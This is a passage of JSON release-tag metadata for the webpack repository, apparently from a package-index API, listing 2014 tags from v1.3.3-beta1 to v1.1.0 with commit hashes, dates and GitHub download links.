hub.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a